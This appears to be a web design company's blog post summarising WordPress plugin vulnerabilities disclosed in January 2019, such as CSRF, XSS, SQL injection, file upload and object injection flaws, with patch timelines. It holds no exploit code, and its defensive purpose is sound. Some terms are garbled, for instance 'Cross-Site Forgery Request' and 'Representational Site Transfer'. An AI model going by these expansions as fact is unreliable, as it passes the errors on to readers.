We take a lot of precautions when it comes to the safety and security of your website but once we hand off your website to you that burden falls on you to maintain that. Nicely Done Sites offers a maintenance agreement so that we can continue to maintain your website so that it remains as safe and secure as possible. We highly recommend all of our clients purchase one but it is not mandatory. If not we hope at least that you do keep your WordPress website up to date and in this series of posts we are going to detail some of the vulnerabilities discovered recently.
So to help you overcome your Super Bowl blues here are the WordPress vulnerabilities from January of 2019.
Two-Factor Authentication
This is a Cross-Site Forgery Request (CSRF) relating to a plugin that sets up Two-Factor Authentication to increase a website’s security. A missing nonce check (code designed to protect URLs and forms from certain types of misuse) allowed an attacker to target someone that was logged into their WordPress page and get them to visit a personally crafted page in the same browser session which would allow the attacker to deactivate Two-Factor Authentication leaving the site protected only by the user’s password. This took about three weeks to fix and was patched on January 8.
WP Auto Suggest
This vulnerability allowed for an unauthorized SQL injection. It took about a month to fix and the plugin was also removed for download at the same time.
Google XML Sitemaps
With this XSS vulnerability if multiple administrators manage the page with this plugin installed one of them could embed an arbitrary script which would be executed when another administrator logs in and browses the page. It took about 3 weeks to fix.
Baggage Freight Shipping Australia
Being in the US chances are you do not have this plugin installed but if you do this vulnerability allowed for an unrestricted file upload from unauthorized users with an arbitrary extension. This took about 2 weeks to fix.
Audio Record
This is another Arbitrary File Upload vulnerability. It took about two weeks to fix.
Adicon Server
This is a SQL Injection vulnerability. This is an older plugin used for icon management. This issue was fixed just after the New Year.
WP Job Manager
This is a Phar Deserialization Vulnerability in which any user with an account on the website could steal data and potentially take over the administrator account. This was fixed a little over 2 weeks after being discovered.
WooCommerce
This is an Authenticated Stored XSS vulnerability. It allowed attackers to take over an account and to give themselves shop manager privileges and eventually hijack the administrator account. This is because when information is stored in a database it is sanitized and is trusted and thus is never checked again for security. This information can be modified after that by a shop manager. This issue was fixed about 3 weeks after being discovered.
JSmol2WP
Two vulnerabilities were discovered for this plugin, which is used to place Jsmol applets in WordPress. The first vulnerability was an XSS vulnerability and the other was a SSRF vulnerability and both were patched within 2 days of discovery. The plugin though was pulled and is no longer available for download as on January 7.
MapSVG Lite
Another CSRF vulnerability for this plugin, which allows a user to create different kinds of maps for your website. The vulnerability was caused by a REST request to modify data not checking the nonce value which allowed for the exploit. A REST request (Representational Site Transfer is mostly associated with HTTP and is an architectural style for designing distributed systems. This was fixed a day after being discovered.
User Registration
Another XSS vulnerability. It was fixed 4 days after discovery.
Spam Bye Bye
Yet another XSS vulnerability which allowed a script to be executed which would give the attacker access to the setup page. It was fixed 3 days after discovery.
Easy Redirect Manager
Still another XSS vulnerability, which allows for a website to be redirected. This is helpful if a website has multiple domains that need to be linked to only one. The vulnerability allowed an attacker to make be able to run a script when the owner views the log file for the plugin. This issue was fixed the following day.
Social Network Tabs
This vulnerability exposed the API information of user’s Twitter accounts, including their access tokens, API key and secret key plainly in the source code. By being able to gather that information an attacker can take over that Twitter account. The tokens allow for a user to save a username and password so that they do not constantly have to log in. This issue was discovered on December 1 and affected Twitter users were informed with their keys being revoked for security reasons. The vulnerability was made public in mid-January and was officially fixed the following day.
Download Ad Manager by WD
This was an arbitrary file download vulnerability that uses an input file to identify a file or directory that are restricted by using special file separators (.., /, etc) in the name. If successful it is possible to access restricted files. This vulnerability was fixed 5 days after being reported.
Health Check and Troubleshooting
Two vulnerabilities were discovered with this plugin. The first was an Authenticated Lack of Authorization. The second was an Authenticated Path Traversal vulnerability. The two vulnerabilities did not have sufficient checks in place regarding user permissions making it possible for any user to perform any action or access any file like the config file which could allow an attacker to create login credentials of their own with administrative access. This vulnerability was fixed a month after discovery.
Total Donations
This is an Arbitrary WordPress Option Values vulnerability that exploits an abandoned plugin that allows an attacker to gain access to WordPress sites. Numerous flaws exposed the WordPress site that opens it up to manipulation from the outside. An attacker is able to potentially change any WordPress site setting, change the destination account for donations or even retrieve email addresses from MailChimp mailing lists. This plugin has been abandoned and it is recommened that it be deleted. Do NOT deactivate it, DELETE IT. The developer is not responding and it is unlikely to be fixed.
Wise Chat
This is a Reverse Tabnabbing vulnerability. It mishandles external links which opens it up to forced tab redirections which can make phishing attacks possible. It was fixed a day after being publicly disclosed.
Yet Another Stars Rating
This is another PHP Object Injection vulnerability. PHP allows developers to serialize objects so that they can be saved in a database for later use. To load new information in it must be unserialized and an object can be added in by an attacker. It can potentially allow an attacker to gain access to a server or to information. This vulnerability was fixed two days after being made public.
There were no core vulnerabilities disclosed in January 2019